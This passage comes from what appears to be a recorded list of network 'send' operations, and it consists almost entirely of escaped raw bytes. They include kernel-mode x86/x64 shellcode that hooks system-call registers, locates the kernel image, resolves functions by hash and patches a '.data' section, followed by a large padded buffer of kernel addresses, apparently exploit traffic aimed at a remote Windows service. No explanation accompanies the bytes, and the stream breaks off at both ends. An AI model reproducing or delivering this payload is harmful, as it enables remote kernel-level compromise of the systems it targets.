x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 9, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 